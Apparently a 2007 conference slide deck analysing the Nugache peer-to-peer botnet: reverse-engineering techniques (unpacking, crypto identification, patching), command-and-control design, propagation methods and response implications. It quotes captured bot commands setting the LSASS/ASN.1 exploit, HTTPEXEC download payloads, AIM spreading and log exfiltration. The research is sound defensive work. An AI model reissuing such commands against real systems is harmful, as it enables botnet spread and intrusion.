Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved David Dittrich University of Washington Bruce Dang Microsoft Corporation Understanding Emerging Threats: The case of Nugache
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Outline Practical Techniques for Reverse Engineering Comparison of Distributed Intruder Tools Networks & Evolution of features/tactics Nugache - New P2P malware Response Implications Conclusions
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Practical techniques Packing, unpacking, identifying crypto, and patching (applied to Nugache)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Agenda Packing Generic unpacking techniques Recognizing “important” functions Identifying cryptographic mechanisms (with and without scripts). Patching and dynamic analysis
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Packing strings(1) does not work well Hinders static analysis Dynamic analysis is a bit harder Anti-debugging mechanisms (that you have not identified) Cannot set breakpoints wisely Creates anger
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Generic unpacking methods The packed regions must be loaded, decrypted or decompressed, and executed. (most of the time) Implies mov reg, [mem], loop, jmp / call reg/mem (read, unpack loop, write, execute) Identify where these operations are happening. (1) You can be lazy and just look for jmp/call reg, jmp/call [reg], jmp imm (2) Memory breakpoints on write/execute regions. (3) “guess” what library calls might be made and set a global breakpoint there (i.e., socket(), gethostbyname(), connect(), etc.) (4) One instruction at a time …
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Recognizing “important” functions Familiarize yourself with common call chains and function relationship: socket, gethostbyname, connect, send, recv, close; CreateFile, ReadFile, WriteFile, CloseHandle, … Example: functions where send/recv occurs are typically dealing with network data; hence, they will be processing important buffers. Give friendly names and use cross-reference to your advantage. If they use encryption, they will need to encrypt the buffer before passing it to send; hence, trace backwards to where it was created and give it a friendly name “XXX_encrypt_buffer.” The same applies for recv Use cross-reference on strings because they usually give important clues about the function itself. “NICK %s” + “JOIN %s” -> probably IRC handler. “200 Command okay” + “212 Directory status” -> probably FTP handler. Identify a KNOWN function, then use cross-reference to trace backwards and give it a meaningful name.
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Code is usually written by humans so you can understand it too …
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Identifying cryptographic mechanisms WITH scripts findcrypt (IDA and OllyDBG) Krypto Kanal (PEID) WITHOUT scripts (symmetric) Identify S-box values (a huge array of integers section). Use cross-reference on the array and give it a friendly name. Repeat until it makes sense. Matrix operations. Setkey - > encrypt (asymmetric) Identify common public exponents (65535, 31337) and big integer multiplication. (hash) HUGE functions which only consist of mov and arithmetic instructions. Think of common call chains: MD5Init - > MD5Update -> MD5Final. I wrote an IDA script to do this. PRNG – no generic way.. Identify common seeders, GetTickCount(), GetCursorPos(), routines with lower/upper bounds arguments, time(NULL), XREFs against functions that you suspect to use PRNG (i.e., random /contact, …)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved
Patching and dynamic analysis Identify the important routines you want to patch. Good targets are ones that do the encryption/decryption. There are several ways you can to do it. Easiest patching method: write your logging function in a padding zone, carve out 5 bytes for a long JMP to the padding zone, JMP back and resume execution.
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved To Sum Up Reverse engineering is non-trivial, but is a critical skill for agile response Static and dynamic analysis techniques complement each other (especially with C++) RE is under-appreciated as a Software Engineering discipline What can you learn from RE? (we move on…)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison of Distributed Intruder Tool Networks Command and control (C2) Structures for Distributed Malware Code reuse/feature convergence Tactical convergence and advances in attack methodologies
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Command & Control (C2) Structures Handler/Agent IRC Botnet Peer to Peer Command and control structures in malware: From Handler/Agent to P2P, by Dave Dittrich and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 8-17
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Propagation mechanisms 1. Exploitation of remotely accessible vulnerabilities in the Windows LSASS (139/tcp) and RPC-DCOM (445/tcp) services 2. to targets obtained from WAB except those containing specific substrings (e.g., “icrosof”, “buse”, “secur”, “dmin”, “.gov”, “.mil”, etc.) 3. Messaging AIM and MSN buddy list members with randomly formed sentence and URL 4. Trojan Horse dropper associated with “celebrity video clips” 5. Trojan Horse SETUP.EXE on free download site Social Engineering Technical Exploits
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Nugache P2P bot Features Analysis and Observations April 30, 2006 through today pcap (full packet), p0f, Snort Collection using Honeynet Project’s Honeywall (versions roo and roo-1.1-RC-2)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Features Successful P2P C&C Original on 8/tcp (now on random high-numbered ports) All C2 over P2P channel (including updates) Advanced use of crypto RSA key exchange Rijndael-256-OFB (w/per-session symmetric keys) Signed commands and binary (4096 bit key) Feature-rich, OO shell command set Exposes only a limited subset of peers to traffic analysis
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Feature Comparison StormNugache Primary C2“Pull” from C2 serversP2P Initial Peer List SeedingText fileBuilt-in, or pre-loaded into Registry (HKCU) Use of Crypto for C2 CommsMD4 hash to conceal file names, 320bit shared key bit RSA key exchange, Rijndael-256- OFB session keys Use of DNS in C2None/ ”Fast Flux” to hide C2 servers None ConnectivityHundreds~1 dozen UpdatesBy command (not at all?)Automatic Listening portRandom high-numbered ArchitectureMultipartiteMonolithic DetectionVisible on host; eDonkey traffic detectable by signature Visible on host; P2P traffic not easily detected by signature Analysis of the Storm and Nugache Trojans: P2P is here, Sam Stover, Dave Dittrich, John Hernandez, and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Analysis and Observations AV Network traffic analysis Propagation and DDoS activity
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved AV Scan Results (Dec. 2006)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Unique IP Addresses Seen
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Seven Days in the Life…
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Example of use (from IRC) 2006/05/19 01:04 GMT #ch4nn3l :scan:exploit,lsass #ch4nn3l :scan:payload,HTTPEXEC, #ch4nn3l :scan:start,3000 #ch4nn3l :scan:target,add, * #ch4nn3l :scan:target,add, * #ch4nn3l :scan:target,add, * #ch4nn3l :scan:target,add,R5000 #ch4nn3l :scan:target,current #ch4nn3l :spaim:10 Replies: :LSASS Operating system ( ) is WinXP [213 times] :Sent execute to AIM_USER_NICK [103 times]
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved IRC Bots vs. 8/tcp Peers SetTime to Observe at2as.bots34 mins. l2k.bots2 mins. port8.peers48 days
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Propagation Events
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Social Engineered Trojan Dropper Attack
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Indirect Propagation
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Download site (Counts from Site 2, not site shown here.)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Features C&C comms heavily encrypted “1 ”
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Command Examples Discrete commands AIM.Spread(10); Scripts.AbortAll(); Looping while(1){ HTTP.Visit(" 0); } Logical operations if(Rand(0,99)==0){ Sleep(Rand(0, )); Logs.Send(" ", 80); } if(!PVAR.IsSet("mail")){ HTTP.Execute(" PVAR.Set("mail", 1); } Command sequences Scan.Targets.Clear(); Scan.SetPayload("HTTPEXEC", " Scan.SetExploit("asn1smbnt"); Scan.Targets.Add("R "); Scan.Start(20000); [some time later…] Scan.Pause(); [some time later…] Scan.Start(); [some time later…] Scan.Stop();
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Encryption/Signing of Commands Command block 10|3|22|AIM.Spread(10);|583E37091E7B8B7AFD EFE7BF08DA3ACB63F611D46A329DD1CF86DB42A7FCD6616F2CAAEA728701FA8B71C782FAA48911D BF069E0091D DD8624CFA982D23761C082BC88C B3E518E6DD8C2E659E1A02EF2DA63C86C78853EF7868A3B92E4F7F8FB7DFB8BD9AF 9F7ACB1A3AE7761A4E008B070B FB4F1DBFA447FD871058F BECAB27AB81B532B EAB A46864B0927E0A8D6F8C7C6D0FA 396D23C33010F D5D166A4F A2EECBA2A7671E CB2D7F07DFBC6ADC3C7A3D2EB9DAEB29DAE79B A70620DFF4CA7E EEF9D3CDC2B191DF6A2C0B1D33F95228C368BD2BE2A7E59D3223B898EA975C991057BEE002B9DA34A97F697F12832B7CBFEB786B438092FEEA362A 10EC9E19602DD9D3F557014DC06DDD34EE5FD14C2D7DB16D9BE05E31DA862341F DE1E4865A867E C DBDDE3FF61B3E34B1 84C20B7B3155DF4D6C6C973B36FBAEC7A6A5D82A0C7C89ACB41BFB60497A3D DEC B756F9633D E3804E127B4C924AAB AB554642ED2E7B04019C70C5DF26BC4D2CA18C30AC990EBAFAA302C91F998C5556D513448FA357AA036A08B9F43A9A2A5EE1C2301F68A70BA8431ED D1AABCDE180F58E4DB13C17FECF47B F96EA337E64FC5A|D027C867 Signature block decrypted with embedded 4096-bit public key 01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFF00B55A34436A2A6AD7DA837A21BA58E5CC Validation $ echo -n "AIM.Spread(10);D027C8673" | md5sum b55a34436a2a6ad7da837a21ba58e5cc -
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Enumeration Experiments Queried all reachable bots for: Connected peers (clients) Known peers Version, etc. 90 samples 160 hosts always up and reachable
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Distribution of Bots by Country
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Enumeration Experiment #3
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Patch Tuesday Effect
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison w/Storm Source: Thorsten Holtz’ “Honeyblog” Source: Brandon Enright
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Actual structure? Rotavirus
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Sub-graph (Degree 9+)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Sub-graph (Degree 10)
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison with Gnutella Source: “Visualizing Large and Dynamic Communication Networks,”
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Response Implications Decreased visibility => More survivability Harder to stop, harder to trace back Expertise needed to infiltrate new botnets Cooperative, collaborative, and optimized response needed
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Operations Considerations DDoS victims: Collect all source IPs (and whatever else you can collect) Sites w/attack peers: Collect full packet data ASAP Honeywall useful at LAN level to collect data, minimize potential for harm Ensure log times are complete and accurate Record IP DNS mappings (and time!) Put data collection at equal priority with takedown
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Conclusions Response is about to get a LOT harder C&C less important; identifying peer connections more important Experts (w/reverse engineers) must be engaged early Collaborative/cooperative response will become essential (lots of opportunities to optimize) There is much research left to do…
Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Thanks and questions Help from: Sven Dietrich (Stevens Institute of Technology), John Hernandez (UW Tacoma), Sam Stover (iSIGHT Partners), “others” Contacts: Bruce Dang Microsoft bda(at)microsoft.com Dave Dittrich University of Washington dittrich(at)u.washington.edu